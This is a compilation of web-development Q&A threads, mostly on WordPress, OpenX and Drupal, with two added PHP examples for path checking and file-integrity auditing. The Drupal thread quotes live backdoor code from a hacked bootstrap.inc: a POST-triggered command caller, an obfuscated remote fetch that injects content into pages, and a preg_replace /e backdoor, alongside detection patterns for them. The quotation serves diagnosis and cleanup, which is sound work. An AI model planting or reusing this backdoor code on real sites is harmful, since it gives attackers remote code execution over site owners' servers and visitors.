OpenX and geotargeting problem - openx

I downloaded the latest version of OpenX 2.8.6 and I am trying to set up geotargeting, but it doesn't work. I enabled geoTargeting in the administration panel (Configuration -> Global settings -> Geotargeting module type -> OpenX Max mind (flat file)). I read in the documentation of OpenX that it's not necessary to put any path to the database in plugin settings, so I tried without. I set up the delivery options of a test banner to be shown only in Serbia. I am refreshing the page that displays banners, but this banner never shows.
I thought that maybe the problem is in the old database and that my IP address is not recognised, so I downloaded the latest database (.dat file) from MaxMind (lite version of Country database) and put the path in the settings of the plugin, but it still doesn't work.
Can anyone help me how to resolve this problem?

I had the same problem. It seems that OpenX since version 2.8.x is using its own php-based GeoIP-Database reader (e.g. the "flatfile" option under settings) instead of using a geoip module - which does not seem to work with current GeoIP.dat
To solve this problem I did the following:
1) open plugins/geoTargeting/oxMaxMindGeoIP/oxMaxMindGeoIP.delivery.php
2) search for:
if (isset($GLOBALS['_MAX']['GEO_IP'])) {
    $ip = $GLOBALS['_MAX']['GEO_IP'];
    OX_Delivery_logMessage('['.$ip.'] : ip from cookie. Plugin_geoTargeting_oxMaxMindGeoIP_oxMaxMindGeoIP_Delivery_getGeoInfo', 7);
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
    OX_Delivery_logMessage('['.$ip.'] : ip from remote addr. Plugin_geoTargeting_oxMaxMindGeoIP_oxMaxMindGeoIP_Delivery_getGeoInfo', 7);
}
$aGeoConf = (is_array($conf['oxMaxMindGeoIP'])) ? $conf['oxMaxMindGeoIP'] : array();
3) insert below:
$ret = array(
    "country_code" => $_SERVER['GEOIP_COUNTRY_CODE']
);
return $ret;
4) save & done
You will find possible return values in the function header:
* @return array An array(
* 'country_code',
* 'region',
* 'city',
* 'postal_code',
* 'latitude',
* 'longitude',
* 'dma_code',
* 'area_code',
* 'organisation',
* 'isp',
* 'netspeed'
* );
*/
Read your module-doc (of mod_geoip) how to get the geo-data from current (or given) IP. In my above example I am using lighttpd 1.5 + mod_geoip (unofficial module). But this fix should also work with apache_note/pecl-geoip/mod_geoip env...
Oh, and btw, it's of course much faster relying on mod_geoip, which caches the db in memory, than doing it all via PHP on every request (as OpenX does it).

Related

How to return binary data from custom wordpress rest api endpoint

I am writing a custom endpoint for a REST api in wordpress, following the guide here: https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/
I am able to write an endpoint that returns JSON data. But how can I write an endpoint that returns binary data (pdf, png, and similar)?
My endpoint function returns a WP_REST_Response (or WP_Error in case of error).
But I do not see what I should return if I want to respond with binary data.
Late to the party, but I feel the accepted answer does not really answer the question, and Google found this question when I searched for the same solution, so here is how I eventually solved the same problem (i.e. avoiding to use WP_REST_Response and killing the PHP script before WP tried to send anything else other than my binary data).
function download(WP_REST_Request $request) {
    $dir = $request->get_param("dir");
    // The following is for security, but my implementation is out
    // of scope for this answer. You should either skip this line if
    // you trust your client, or implement it the way you need it.
    $dir = sanitize_path($dir);
    $file = $request->get_param("file");
    // See above...
    $file = sanitize_path($file);
    $sandbox = "/some/path/with/shared/files";
    // full path to the file
    $path = $sandbox.$dir.$file;
    $name = basename($path);
    // get the file mime type
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime_type = finfo_file($finfo, $path);
    // tell the browser what it's about to receive
    header("Content-Disposition: attachment; filename=$name;");
    header("Content-Type: $mime_type");
    header("Content-Description: File Transfer");
    header("Content-Transfer-Encoding: binary");
    header('Content-Length: ' . filesize($path));
    header("Cache-Control: no-cache private");
    // stream the file without loading it into RAM completely
    $fp = fopen($path, 'rb');
    fpassthru($fp);
    // kill WP
    exit;
}
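An added example, not part of the answer above: one way to do the path check that the answer leaves out of scope, resolving the requested path with realpath() and requiring the result to stay under the sandbox directory. resolve_in_sandbox() and safe_download_name() are hypothetical names, and the demo files are constructed.

```php
<?php
// Added example (not from the original answer): resolve a client-supplied
// relative path inside a sandbox directory and reject anything that escapes it.
// resolve_in_sandbox() and safe_download_name() are hypothetical helper names.

function resolve_in_sandbox(string $sandbox, string $relative): ?string
{
    $base = realpath($sandbox);
    if ($base === false || strpos($relative, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; it returns false if missing.
    $full = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Compare against the base plus a trailing separator so that a sibling
    // such as /srv/shared-evil does not pass a prefix check for /srv/shared.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

function safe_download_name(string $path): string
{
    // Keep only characters that cannot alter the Content-Disposition header.
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
    return ($name === null || $name === '') ? 'download' : $name;
}

// Constructed demo: a temporary sandbox with one file and a file outside it.
$root = sys_get_temp_dir() . '/sandbox_demo_' . getmypid();
mkdir("$root/shared/docs", 0700, true);
file_put_contents("$root/shared/docs/report v1.pdf", "%PDF-demo");
file_put_contents("$root/secret.txt", "outside the sandbox");

foreach (['docs/report v1.pdf', '../secret.txt', 'docs/../../secret.txt', 'docs/missing.pdf'] as $req) {
    $path = resolve_in_sandbox("$root/shared", $req);
    printf("%-24s => %s\n", $req, $path === null ? 'REJECTED' : 'OK as ' . safe_download_name($path));
}
```

In the endpoint, a null result would be returned as a WP_Error before any header is sent, and the sanitized name would be used in a quoted filename="..." parameter.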
I would look at something called DOMPDF. In short, it streams any HTML DOM straight to the browser.
We use it to generate live copies of invoices straight from the woo admin, generate brochures based on $wp_query results etc. Anything that can be rendered by a browser can be streamed via DOMPDF.

includes/bootstrap.inc hacked/changed constantly

My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between 771 and 808 line of includes/bootstrap.inc file (code below).
This file is somehow changed constantly (once a week), from 120kb to 123kbs. Wherever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting response is longer by 10-15 seconds.
The drupal 7 is updated to 7.41, the modules are up to date.
The code that's causing the issue, is somewhere between those lines (I suspect its the "cookie" part). This is the infected/added part my hosting provider warned me about:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
// setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
// $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
I'm no back-end developer and I've been using bootstrap for a hobby-related project for over 8 years.
I tried to clean D7 (reuploaded fresh includes, modules and everything apart from /sites/). Tried to check this on some popular scanners.
Does anyone have any idea how to block these changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip where it's coming from?
Thank you in advance.
I had the same hack on my Drupal site. The code they put in the bootstrap.inc file looked almost identical to yours.
Apart from the changes to bootstrap.inc, the hackers installed multiple backdoors in various modules. I was able to find the backdoors using the Hacked module, which allows you to find modified files.
The backdoors in my Drupal looked similar to this code:
<?php @preg_replace('/(.*)/e', @$_POST['ttqdgkkfkolmt'], '');
This code uses a vulnerability in preg_replace, which allows the attackers to execute random PHP code using a simple HTTP post request. (The preg_replace vulnerability is resolved in PHP version > 5.5)
Hope this helped. Good luck finding the backdoors!
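An added example, not from this thread or from the Hacked module: the same idea as a standalone script, comparing a live tree against a clean copy of the same release by hash and checking changed files for the indicators quoted above. hash_tree(), audit_tree() and the demo trees are assumptions.

```php
<?php
// Added example: diff a live tree against a clean copy of the same release,
// then check changed files for indicators quoted in this thread. Helper names are hypothetical.
const INDICATORS = [
    'preg_replace /e fed from request' =>
        '/preg_replace\s*\(\s*([\'"]).*?\/[a-zA-Z]*e[a-zA-Z]*\1\s*,\s*@?\s*\$_(POST|GET|REQUEST|COOKIE)/',
    'array element called as function' => '/\$\w+\[[^\]]+\]\s*\(\s*@?\$\w+\[/',
    'names from the quoted sample'     => '/\$_passssword|decrypt_url\s*\(/',
];

function hash_tree(string $root): array
{
    $out = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if ($f->isFile()) {
            $rel = substr($f->getPathname(), strlen($root) + 1); // $root has no trailing slash
            $out[$rel] = hash_file('sha256', $f->getPathname());
        }
    }
    return $out;
}

function audit_tree(string $clean, string $live): array
{
    $ref = hash_tree($clean);
    $findings = [];
    foreach (hash_tree($live) as $rel => $hash) {
        if (($ref[$rel] ?? null) === $hash) {
            continue; // byte-identical to the clean release
        }
        $body = (string) file_get_contents("$live/$rel");
        $hits = array_keys(array_filter(INDICATORS, fn($re) => preg_match($re, $body) === 1));
        $findings[$rel] = [isset($ref[$rel]) ? 'modified' : 'added', $hits];
    }
    ksort($findings);
    return $findings;
}

// Constructed demo trees; the "live" samples are inert text without a PHP open tag.
$tmp = sys_get_temp_dir() . '/audit_demo_' . getmypid();
foreach (['clean', 'live'] as $d) {
    mkdir("$tmp/$d/includes", 0700, true);
    file_put_contents("$tmp/$d/includes/bootstrap.inc", "function drupal_bootstrap() {}\n");
}
file_put_contents("$tmp/live/includes/bootstrap.inc", "\$url = decrypt_url('...');\n", FILE_APPEND);
file_put_contents("$tmp/live/includes/x.php", "@preg_replace('/(.*)/e', @\$_POST['k'], '');\n");
print_r(audit_tree("$tmp/clean", "$tmp/live"));
```

A pattern hit only narrows where to look first; every modified or added file in the result still needs review, since a backdoor can be written without any of these strings.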

How can I use a different login/signup mechanism for wordpress

I have so far integrated a multisite wordpress that uses 4 main subdomain templates in a single wordpress installation: college.mysite.com | jobs.mysite.com | advisors.mysite.com | answers.mysite.com
A wp user is only required to login once and they immediately have access to any wp template.
However, what I would like to achieve is a bit more complicated than that. I don't want new users and existing members to use wordpress as their main user interface to access private content.
In fact I have disabled registration and hidden wp login altogether.
I would like a more secure and less public signup/login.
For this occasion I would like wordpress to ignore the default login credentials and use instead custom db table names and hash method pulled from the same wordpress database.
For instance I have a yii platform called: humhub.
For a user to use wordpress they would need to login through humhub and have wp read the db table names:
user instead of wp_users
a secondary db name would need to be read for the password because humhub uses:
user_password instead of the default value within wp_users (user_pass)
I've tried integrating yii framework with wordpress, I've tried tweaking here and about within the yii framework so that it reads two databases separately but it's far more complicated than simply redirecting the wp login credentials by changing the default login table names within the wordpress files,
please help me,
Let's assume you have some unique identifier so that one user will not accidentally collide with another (in YII/HumHub)
You can load up the WordPress API via
require_once("/path/to/wp-load.php");
//Found normally in the WordPress root directory alongside wp-config.php
You can then when creating a new user in HumHub do:
wp_create_user( $username, $password, $email );
//Where username is the unique identifier
//password is ideally a random hash
//email is their email if relevant
And then log them in (assuming you remembered the username and password!!)
$creds = array();
$creds['user_login'] = $username;
$creds['user_password'] = $password;
$creds['remember'] = true;
$user = wp_signon( $creds, false );
if ( !is_wp_error($user) ) {
ob_start(); //flush buffers - otherwise login won't work or user gets redirected to dashboard
$user_id = $user->ID;
wp_set_current_user( $user_id, null );
wp_set_auth_cookie( $user_id,true );
do_action( 'wp_login', $username );
ob_end_clean();
} else {
//Handle the login error
}
They are then logged into WordPress with cookies etc without any headers interfering with HumHub
Note - the above method may not work if there is a name conflict between WordPress and YII/HumHub. You will get a PHP error with details of the conflict if that is the case and will have to try something else (such as an OAuth plugin)

Not getting any emails from my Wordpress app on open shift

I am not getting any emails (to the admins) from my Wordpress app on open shift. I installed it using the wordpress example.
I have a contact page form that was working in my other hosting provider.
any ideas?
I had an issue before where emails weren't sending and I added this to my functions.php file:
/**
* change WordPress default FROM email address
**/
add_filter('wp_mail_from', 'new_mail_from');
add_filter('wp_mail_from_name', 'new_mail_from_name');
function new_mail_from($old) {
$email = get_option( 'admin_email' );
return $email;
}
function new_mail_from_name($old) {
$site_name = get_option( 'blogname');
return $site_name;
}
I would erase all of that. I am a very good user in this situation.
#1 every time you change the server, you have to redo the mailer settings.
#2 only and I do mean only use wp-mailer plugin.
#3 set your settings correctly and follow the instructions if you are using wordfence.
#4 for woo, you have to style the mailer in ftp.

Loading Google Maps API with wp_enqueue_script

I'm trying to load the Google Maps API using the following syntax:
add_action('admin_enqueue_scripts', 'load_google_maps');
...
function load_google_maps()
{
    // The actual API key is configured in an options page
    $key = get_option('google_maps_api_key');
    $gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&amp;sensor=false';
    wp_enqueue_script('google-maps', $gmaps_url, NULL, NULL);
}
WordPress is escaping the "&" to "&#038". This actually makes the Google server reject the request. When I type it directly into browser address bar with "&sensor=false" at the end, it loads fine.
I saw a bug of this kind mentioned in the WordPress trac system: http://core.trac.wordpress.org/ticket/9243 but it was dismissed as invalid, and the admin responding to the request showed somehow that the "&#038" approach was fine. It is definitely not fine from Google's point of view.
I could of course just get the function to echo the HTML as a script tag, but I'd rather use the wp_enqueue_script system if possible.
Anyone know of a solution to this?
Cheers,
raff
I've got something similar in our code, and it's working fine (even encoded as &#038). I suspect your problem is that it's being double-encoded, as you already have &amp;. Try changing it to:
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
For what it's worth, our (working) code is:
wp_register_script('googlemaps', 'http://maps.googleapis.com/maps/api/js?' . $locale . '&key=' . GOOGLE_MAPS_V3_API_KEY . '&sensor=false', false, '3');
wp_enqueue_script('googlemaps');
($locale in this case is set to hl=en)
Edit
Looks like the behaviour's changed in the latest version of WordPress - the above doesn't work (but I'll leave it for people on legacy versions). The only alternative I can see to echoing the script is to add a clean_url filter, something like this:
add_filter('clean_url', 'so_handle_038', 99, 3);
function so_handle_038($url, $original_url, $_context) {
    if (strstr($url, "googleapis.com") !== false) {
        $url = str_replace("&#038;", "&", $url); // or $url = $original_url
    }
    return $url;
}
Pretty ugly, but perhaps marginally better than echoing the script, as it'll still use the WordPress dependency management.
